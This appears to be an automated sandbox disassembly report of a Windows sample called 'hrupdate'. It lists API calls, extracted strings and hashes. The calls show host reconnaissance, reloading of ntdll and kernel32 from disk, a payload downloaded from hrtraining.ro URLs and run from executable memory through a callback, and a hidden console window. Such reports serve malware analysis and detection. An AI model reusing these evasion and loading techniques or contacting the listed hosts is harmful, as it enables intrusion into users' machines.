46b9ce2 19069->19071 19073 46b9d23 19070->19073 19074 46b0e0c _calloc 66 API calls 19071->19074 19072->19050 19075 46b0e0c _calloc 66 API calls 19073->19075 19076 46b9cea 19074->19076 19077 46b9d2a 19075->19077 19076->19050 19078 46b2df7 __fsopen 6 API calls 19077->19078 19078->19072 19079->19043 19083 46b9de7 RtlLeaveCriticalSection 19080->19083 19082 46b655c 19082->18953 19083->19082 19085 46b3cf9 19084->19085 19088 46b3ab1 19085->19088 19089 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 19088->19089 19092 46b3ac6 19089->19092 19090 46b3ad8 19091 46b0e0c _calloc 66 API calls 19090->19091 19093 46b3add 19091->19093 19092->19090 19096 46b3b15 19092->19096 19094 46b2df7 __fsopen 6 API calls 19093->19094 19099 46b3aed 19094->19099 19097 46b3b5a 19096->19097 19100 46b7915 19096->19100 19098 46b0e0c _calloc 66 API calls 19097->19098 19097->19099 19098->19099 19101 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 19100->19101 19102 46b7929 19101->19102 19103 46b78ca __isleadbyte_l 76 API calls 
19102->19103 19106 46b7936 19102->19106 19104 46b795e 19103->19104 19107 46ba658 19104->19107 19106->19096 19108 46b00cd _LocaleUpdate::_LocaleUpdate 76 API calls 19107->19108 19109 46ba66b 19108->19109 19112 46ba49e 19109->19112 19113 46ba4ea 19112->19113 19114 46ba4bf GetStringTypeW 19112->19114 19115 46ba5d1 19113->19115 19117 46ba4d7 19113->19117 19116 46ba4df GetLastError 19114->19116 19114->19117 19119 46bc0b0 ___ansicp 84 API calls 19115->19119 19116->19113 19118 46ba523 MultiByteToWideChar 19117->19118 19130 46ba5cb 19117->19130 19120 46ba550 19118->19120 19118->19130 19122 46ba5f5 19119->19122 19125 46ba565 _memset 19120->19125 19126 46aea1b _malloc 66 API calls 19120->19126 19121 46b655e failwithmessage 5 API calls 19123 46ba656 19121->19123 19124 46ba622 GetStringTypeA 19122->19124 19127 46bc0f9 ___convertcp 73 API calls 19122->19127 19122->19130 19123->19106 19129 46ba63d 19124->19129 19124->19130 19128 46ba59e MultiByteToWideChar 19125->19128 19125->19130 19126->19125 19131 46ba616 19127->19131 19132 46ba5c5 19128->19132 19133 46ba5b4 GetStringTypeW 19128->19133 19134 46ae93e __getstream 66 API calls 19129->19134 19130->19121 19131->19124 19131->19130 19135 46b74c0 __freea 66 API calls 19132->19135 19133->19132 19134->19130 19135->19130 19143 46af151 19136->19143 19138 46af28e 19138->18724 19142 46a722e 19139->19142 19140 46b655e failwithmessage 5 API calls 19141 46a731e 19140->19141 19141->18724 19142->19140 19144 46af15d __fsopen 19143->19144 19145 46b1075 __lock 66 API calls 19144->19145 19146 46af164 19145->19146 19147 46af21d _doexit 19146->19147 19149 46b03d1 __decode_pointer 6 API calls 19146->19149 19160 46af268 19147->19160 19151 46af19b 19149->19151 19151->19147 19154 46b03d1 __decode_pointer 6 API calls 19151->19154 19153 46af265 __fsopen 19153->19138 19159 46af1b0 19154->19159 19155 46af25c 19156 46af061 __mtinitlocknum 3 API calls 19155->19156 19156->19153 19157 46b03d1 6 API calls __decode_pointer 19157->19159 19158 46b03c8 6 API calls 
___crtMessageBoxW 19158->19159 19159->19147 19159->19157 19159->19158 19161 46af26e 19160->19161 19162 46af249 19160->19162 19165 46b0f9b RtlLeaveCriticalSection 19161->19165 19162->19153 19164 46b0f9b RtlLeaveCriticalSection 19162->19164 19164->19155 19165->19162 19167 46a0d71 19166->19167 19233 46a7461 19167->19233 19169 46af27d 66 API calls 19170 46a0d8d 19169->19170 19170->19169 19172 469ce3c GetCurrentProcessId GetTickCount 19170->19172 19239 46bd4e0 19170->19239 19172->18424 19174 469747c 5 API calls 19173->19174 19175 46944db 19174->19175 19175->18427 19177 46a45db CheckTokenMembership 19176->19177 19178 469ce90 19176->19178 19179 46a45ed 19177->19179 19180 46a45f0 FreeSid 19177->19180 19181 46967cd htonl htonl 19178->19181 19179->19180 19180->19178 19181->18435 19183 4696882 19182->19183 19184 4696860 _memcpy_s 19182->19184 19183->18438 19185 469686e htonl 19184->19185 19185->19183 19187 4696851 htonl 19186->19187 19188 469681c GetCurrentProcessId 19187->19188 19188->18444 19190 4696851 htonl 19189->19190 19191 469683c 19190->19191 19192 469683f 19191->19192 19193 4696851 htonl 19192->19193 19194 469684e 19193->19194 19195 469cca3 19194->19195 19196 469cf5f 66 API calls 19195->19196 19197 469ccb6 19196->19197 19198 469ccf8 GetUserNameA GetComputerNameA 19197->19198 19309 469737d 19198->19309 19201 469cd36 _strrchr 19202 469cd53 GetVersionExA 19201->19202 19203 469683f htonl 19202->19203 19204 469cd79 19203->19204 19205 469683f htonl 19204->19205 19206 469cd84 19205->19206 19207 469681f 2 API calls 19206->19207 19208 469cd8f 19207->19208 19209 4696802 2 API calls 19208->19209 19210 469cd97 19209->19210 19211 4696802 2 API calls 19210->19211 19212 469cda3 19211->19212 19213 4696802 2 API calls 19212->19213 19214 469cdaf 19213->19214 19215 4696802 2 API calls 19214->19215 19216 469cdb8 19215->19216 19217 46aeb76 __snprintf 102 API calls 19216->19217 19218 469cdd0 19217->19218 19219 4696851 htonl 19218->19219 19220 469cdf4 19219->19220 19312 469cfaa 
                                      APIs
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671DC4
                                      • memcpy.VCRUNTIME140(00000000,00000001,00000001,00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671DFD
                                        • Part of subcall function 00672730: memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0067275D
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671EC0
                                      • memcpy.VCRUNTIME140(00000000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671EFB
                                      • memchr.VCRUNTIME140 ref: 00671F1C
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671F9B
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 0067201C
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,A92820B5), ref: 006720CB
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(006742CD,00000000,00674308,00000001,00000000,00000000,00000000,00000000,?,?,A92820B5,?,00000000), ref: 0067213B
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00672259
                                      • inet_addr.WS2_32(00000000), ref: 00672273
                                      • gethostbyname.WS2_32(00000000), ref: 0067227B
                                      • inet_addr.WS2_32(00000000), ref: 00672283
                                      • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 00672296
                                      • htons.WS2_32(00000050), ref: 006722BB
                                      • connect.WS2_32(00000000,?,00000010), ref: 006722D2
                                        • Part of subcall function 00672730: memcpy.VCRUNTIME140(00000000,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0067280C
                                      • send.WS2_32(00000000,?,?,00000000), ref: 00672414
                                      • memset.VCRUNTIME140 ref: 00672429
                                      • recv.WS2_32(?,?,00000200,00000000), ref: 00672445
                                      • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00672465
                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 0067247D
                                      • memset.VCRUNTIME140 ref: 00672495
                                      • recv.WS2_32(?,?,00000200,00000000), ref: 006724AC
                                      • strstr.VCRUNTIME140 ref: 006724C7
                                      • strstr.VCRUNTIME140 ref: 006724DA
                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 00672508
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,-00000004), ref: 00672530
                                      • closesocket.WS2_32(?), ref: 00672563
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00672595
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006725D1
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00672628
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy$inet_addrmemsetrecvstrstr$closesocketconnectgethostbyaddrgethostbynamehtonsmemchrreallocsendsocketstrncpy
                                      • String ID: $$GET %s HTTP/1.0$Host: %s$http://$https://
                                      • API String ID: 241144766-2968714747
                                      • Opcode ID: 71425c9cb8b6a99e54fa0f3d1d1d44ca281a2c1c5873eeaf5546bb1c3cb9a130
                                      • Instruction ID: 2b0779c1f403106f20fd427f20977f3e54091cb76cb5b2e21c639a03f151754b
                                      • Opcode Fuzzy Hash: 71425c9cb8b6a99e54fa0f3d1d1d44ca281a2c1c5873eeaf5546bb1c3cb9a130
                                      • Instruction Fuzzy Hash: 1D5238319001598FDB24DF68CCA4BEDBB77EF45314F1482A9E40DAB281DB329A85CF60

                                      Control-flow Graph

                                      APIs
                                      • WSAStartup.WS2_32(00000101,?), ref: 006714D0
                                      • GetUserNameW.ADVAPI32(?,?), ref: 006714EE
                                      • wcstombs_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000101,?,00000101), ref: 00671513
                                      • memset.VCRUNTIME140 ref: 0067155E
                                      • strncat.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000400), ref: 00671579
                                        • Part of subcall function 00672180: socket.WS2_32(00000002,00000001,00000006), ref: 00672259
                                        • Part of subcall function 00672180: inet_addr.WS2_32(00000000), ref: 00672273
                                        • Part of subcall function 00672180: gethostbyname.WS2_32(00000000), ref: 0067227B
                                        • Part of subcall function 00672180: htons.WS2_32(00000050), ref: 006722BB
                                        • Part of subcall function 00672180: connect.WS2_32(00000000,?,00000010), ref: 006722D2
                                      • WSACleanup.WS2_32 ref: 006715A7
                                      • LoadStringW.USER32(?,00000067,SibcorUpdate,00000064), ref: 006715BD
                                      • LoadStringW.USER32(?,0000006D,SIBCORUPDATE,00000064), ref: 006715C9
                                      • LoadIconW.USER32(?,0000006B), ref: 0067160C
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0067161B
                                      • LoadIconW.USER32(?,0000006C), ref: 0067164D
                                      • RegisterClassExW.USER32(00000030), ref: 0067165C
                                      • CreateWindowExW.USER32(00000000,SIBCORUPDATE,SibcorUpdate,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0067168E
                                      • UpdateWindow.USER32(00000000), ref: 0067169F
                                      • LoadIconW.USER32(?,0000006B), ref: 006716A8
                                      • lstrcpyW.KERNEL32(?,HR Trainings), ref: 006716F2
                                      • Shell_NotifyIconW.SHELL32(00000000,000003BC), ref: 00671701
                                      • LoadAcceleratorsW.USER32(?,0000006D), ref: 0067170A
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00671819
                                      • DialogBoxParamW.USER32(?,00000067,?,00671A20,00000000), ref: 00671839
                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00671859
                                      • TranslateMessage.USER32(?), ref: 0067186A
                                      • DispatchMessageW.USER32(?), ref: 00671877
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0067188A
                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006718A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Load$IconMessage$StringTranslateWindow$AcceleratorAcceleratorsClassCleanupCreateCursorDialogDispatchNameNotifyParamRegisterShell_StartupUpdateUserconnectgethostbynamehtonsinet_addrlstrcpymemsetsocketstrncatterminatewcstombs_s
                                      • String ID: ,Dg$HR Trainings$SIBCORUPDATE$SibcorUpdate$http://www.hrtraining.ro/trakingu/
                                      • API String ID: 821071236-3868026344
                                      • Opcode ID: 1d1096f865704529330a5073a26a8581e8bfaeb79caa34753a15204c31ec98fd
                                      • Instruction ID: 37caad4d6a82c5c6d97e22f55130243aa366924fdf7f14d7b9239964ecd5f0be
                                      • Opcode Fuzzy Hash: 1d1096f865704529330a5073a26a8581e8bfaeb79caa34753a15204c31ec98fd
                                      • Instruction Fuzzy Hash: EDC16B70D403299BEB24DF64DC49BEABBB9EB05705F0041DAE50DA6280DBB56BC4CF91

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                      • GetUserNameA.ADVAPI32(?,?), ref: 0469CD08
                                      • GetComputerNameA.KERNEL32(?,?), ref: 0469CD18
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 0469CD2C
                                      • _strrchr.LIBCMT ref: 0469CD3B
                                      • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0469CD56
                                      • __snprintf.LIBCMT ref: 0469CDCB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
                                      • String ID: %s%s%s
                                      • API String ID: 1877169212-1891519693
                                      • Opcode ID: 3a3d78d8001dbbfa8abe69f64fcd8b8271ef147f6d1a048af0ea9f00236c27d4
                                      • Instruction ID: dab70b2f5b5404c98bfb3054e99627fe19bed293c19c323e5bdb760d6bced202
                                      • Opcode Fuzzy Hash: 3a3d78d8001dbbfa8abe69f64fcd8b8271ef147f6d1a048af0ea9f00236c27d4
                                      • Instruction Fuzzy Hash: FE419D71D00205AEEF01AFA5DD49DBEBFF8EF45314F10446AE504A6251FBB5AE00DB64

                                      Control-flow Graph

                                      [Control-flow graph figure omitted; legend: Executed / Not Executed. Nodes 816-821 (46a5173-46a51d9): CryptAcquireContextA, retried once on failure, then CryptGenRandom and CryptReleaseContext.]
                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000020,00000080,00000000,?,?,046A51E9,?,0469CE33,?,0469CE33,?), ref: 046A5196
                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000028,?,?,046A51E9,?,0469CE33,?,0469CE33,?), ref: 046A51A9
                                      • CryptGenRandom.ADVAPI32(00000000,0469CE33,?,?,?,046A51E9,?,0469CE33,?,0469CE33,?), ref: 046A51BD
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,046A51E9,?,0469CE33,?,0469CE33,?), ref: 046A51CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$Acquire$RandomRelease
                                      • String ID: Microsoft Base Cryptographic Provider v1.0
                                      • API String ID: 685801729-291530887
                                      • Opcode ID: 50a0065e9d0177d8c44a6a369e3154ee005084b81ce946796e92da3b72108153
                                      • Instruction ID: fac065636faa7ece3dd7c190ff4d318e33f61bf78f942d64cd8ca43ecfdec53b
                                      • Opcode Fuzzy Hash: 50a0065e9d0177d8c44a6a369e3154ee005084b81ce946796e92da3b72108153
                                      • Instruction Fuzzy Hash: A4F08136A01224F7DF108A51DD09FEE7A6CDB45764F104011FA02A2140E671AE109EA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: p=v
                                      • API String ID: 0-1262632170
                                      • Opcode ID: 554588e925b44466993c2a017f1faf32c77b4d25bc138d1276de5794f8837f1a
                                      • Instruction ID: a4334244c21ed68580b38bb53d338428586991b53007cbdd22ac56e92c25171f
                                      • Opcode Fuzzy Hash: 554588e925b44466993c2a017f1faf32c77b4d25bc138d1276de5794f8837f1a
                                      • Instruction Fuzzy Hash: DCD022313C8D089AFB40FE00FC801797399E7E0A10F800E9DEA0102100BA27FC31CE81

                                      Control-flow Graph

                                      [Control-flow graph figure omitted; legend: Executed / Not Executed. Nodes 221-281 (672180-672659): socket, inet_addr with gethostbyname or gethostbyaddr, htons and connect, then send, a memset/recv loop with realloc and memcpy, strstr, memcpy, strncpy, closesocket, and _invalid_parameter_noinfo_noreturn error paths.]
                                      APIs
                                        • Part of subcall function 00671CA0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,A92820B5,?,00000000), ref: 00671DC4
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00672259
                                      • inet_addr.WS2_32(00000000), ref: 00672273
                                      • gethostbyname.WS2_32(00000000), ref: 0067227B
                                      • inet_addr.WS2_32(00000000), ref: 00672283
                                      • gethostbyaddr.WS2_32(?,00000004,00000002), ref: 00672296
                                      • htons.WS2_32(00000050), ref: 006722BB
                                      • connect.WS2_32(00000000,?,00000010), ref: 006722D2
                                      • send.WS2_32(00000000,?,?,00000000), ref: 00672414
                                      • memset.VCRUNTIME140 ref: 00672429
                                      • recv.WS2_32(?,?,00000200,00000000), ref: 00672445
                                      • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000), ref: 00672465
                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 0067247D
                                      • memset.VCRUNTIME140 ref: 00672495
                                      • recv.WS2_32(?,?,00000200,00000000), ref: 006724AC
                                      • strstr.VCRUNTIME140 ref: 006724C7
                                      • strstr.VCRUNTIME140 ref: 006724DA
                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 00672508
                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,-00000004), ref: 00672530
                                      • closesocket.WS2_32(?), ref: 00672563
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00672595
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006725D1
                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00672628
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$inet_addrmemcpymemsetrecvstrstr$closesocketconnectgethostbyaddrgethostbynamehtonsreallocsendsocketstrncpy
                                      • String ID: $$GET %s HTTP/1.0$Host: %s
                                      • API String ID: 1879041676-1199678302
                                      • Opcode ID: 4c0fa364c9beadfdbc0fddcc2ada1d4689ade680e15c0e3575c30b6447cbc18b
                                      • Instruction ID: 7b6e03c73bb8f30e80a3e91a320549e7357da60f9cc9d14a066ccc15265e073c
                                      • Opcode Fuzzy Hash: 4c0fa364c9beadfdbc0fddcc2ada1d4689ade680e15c0e3575c30b6447cbc18b
                                      • Instruction Fuzzy Hash: 65D1D2719002199FEB24DF24CC59BEDB777AF95304F0482D8E40DAB282DB329A95CF64

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00672DCF: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,006727F7,00000000,00000000,?,?,?,00000000), ref: 00672DE4
                                      • _Cnd_init.MSVCP140(?,00000000), ref: 0067110F
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00671123
                                      • _Mtx_init.MSVCP140(?,00000001), ref: 00671144
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00671152
                                      • _Mtx_lock.MSVCP140(?), ref: 00671172
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00671180
                                      • _Thrd_start.MSVCP140(?,Function_00001090,00674424), ref: 006711AA
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000001), ref: 006711C3
                                      • _Cnd_wait.MSVCP140(?,?), ref: 006711D6
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 006711E4
                                      • _Mtx_unlock.MSVCP140(?), ref: 00671212
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00671220
                                      • _Mtx_destroy.MSVCP140(?), ref: 00671228
                                      • _Cnd_destroy.MSVCP140(?), ref: 00671234
                                      • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0067124A
                                      • ?_Throw_Cpp_error@std@@YAXH@Z.MSVCP140(00000001), ref: 00671270
                                      • _Thrd_detach.MSVCP140(?,?), ref: 0067127F
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 0067128D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Throw_$C_error@std@@$Cnd_destroyCnd_initCnd_waitCpp_error@std@@Mtx_destroyMtx_initMtx_lockMtx_unlockThrd_detachThrd_startmallocterminate
                                      • String ID: $Dg
                                      • API String ID: 3376608752-2277919188
                                      • Opcode ID: f7b93b563e9b5c4baf9f8613cb922d84925923e5c8017ac90e9fdcdbfd38379d
                                      • Instruction ID: ba8a7c56d54c310cee94f87129e9d727f13bbd6da6f7c25c21f17cd9331e00f9
                                      • Opcode Fuzzy Hash: f7b93b563e9b5c4baf9f8613cb922d84925923e5c8017ac90e9fdcdbfd38379d
                                      • Instruction Fuzzy Hash: 626160B0D00248AFDF10CBA8DD497DEBBF5BF05304F14412AE909A6351EB75AA54CBA2

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00671B30: GetCurrentProcess.KERNEL32 ref: 00671B47
                                        • Part of subcall function 00671B30: GetModuleHandleA.KERNEL32 ref: 00671B62
                                        • Part of subcall function 00671B30: K32GetModuleInformation.KERNEL32(00000000,00000000,?,0000000C), ref: 00671B73
                                        • Part of subcall function 00671B30: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671B8F
                                        • Part of subcall function 00671B30: CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671BA6
                                        • Part of subcall function 00671B30: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671BB8
                                        • Part of subcall function 00671B30: VirtualProtect.KERNEL32(?,?,00000040,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C2C
                                        • Part of subcall function 00671B30: memcpy.VCRUNTIME140(?,?,?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C43
                                        • Part of subcall function 00671B30: VirtualProtect.KERNEL32(?,?,?,?), ref: 00671C5C
                                        • Part of subcall function 00671B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C76
                                        • Part of subcall function 00671B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C7B
                                        • Part of subcall function 00671B30: CloseHandle.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C80
                                        • Part of subcall function 00671B30: FreeLibrary.KERNEL32(?,?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00671C85
                                      • GetConsoleWindow.KERNEL32(00000000), ref: 00672CCA
                                      • ShowWindow.USER32(00000000), ref: 00672CD1
                                      • WSAStartup.WS2_32 ref: 00672D32
                                        • Part of subcall function 00672180: socket.WS2_32(00000002,00000001,00000006), ref: 00672259
                                        • Part of subcall function 00672180: inet_addr.WS2_32(00000000), ref: 00672273
                                        • Part of subcall function 00672180: gethostbyname.WS2_32(00000000), ref: 0067227B
                                        • Part of subcall function 00672180: htons.WS2_32(00000050), ref: 006722BB
                                        • Part of subcall function 00672180: connect.WS2_32(00000000,?,00000010), ref: 006722D2
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00672D60
                                      • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 00672D6D
                                      • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,?), ref: 00672D83
                                      • FlsAlloc.KERNEL32(?), ref: 00672D8A
                                      • FlsSetValue.KERNEL32(00000000,?), ref: 00672D9E
                                      • WSACleanup.WS2_32 ref: 00672DA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Handle$CloseFileVirtual$AllocCreateModuleProtectWindowmemcpy$CertCleanupConsoleCurrentEnumFreeInformationLibraryMappingProcessShowStartupStoreSystemValueViewconnectgethostbynamehtonsinet_addrsocket
                                      • String ID: c:\windows\system32\kernel32.dll$c:\windows\system32\ntdll.dll$dummy$http://www.hrtraining.ro/trainingcheck_v5498$kernel32.dll$ntdll.dll
                                      • API String ID: 3600704002-5958019
                                      • Opcode ID: 4992d9913989be341c631ddc213340972d96a96504dd33e1cc5cd2984d2d9d8b
                                      • Instruction ID: 5a1791fac195d9107dfb8608a8d9cc81be09367076f73cbaf7bd049164928eb1
                                      • Opcode Fuzzy Hash: 4992d9913989be341c631ddc213340972d96a96504dd33e1cc5cd2984d2d9d8b
